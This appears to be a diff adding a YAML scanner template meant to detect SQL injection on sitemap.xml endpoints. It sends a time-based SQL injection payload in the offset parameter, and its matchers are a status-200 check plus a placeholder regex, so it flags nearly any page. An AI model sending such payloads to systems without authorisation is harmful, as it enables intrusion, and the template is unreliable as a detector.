sitemap-sql

It will be useful to detect sql on the sitemap.xml endpoints or extensions

http/misconfiguration/sitemap-sql-detector.yaml

@@ -0,0 +1,18 @@
+id: sql-injection
+info:
+  name: SQL Injection
+  author: Aravind
+  severity: high
+  tags: [web, injection, sql]
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)#"
+    matchers-condition: or
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        part: body
+        regex: "Expected response content or regex here"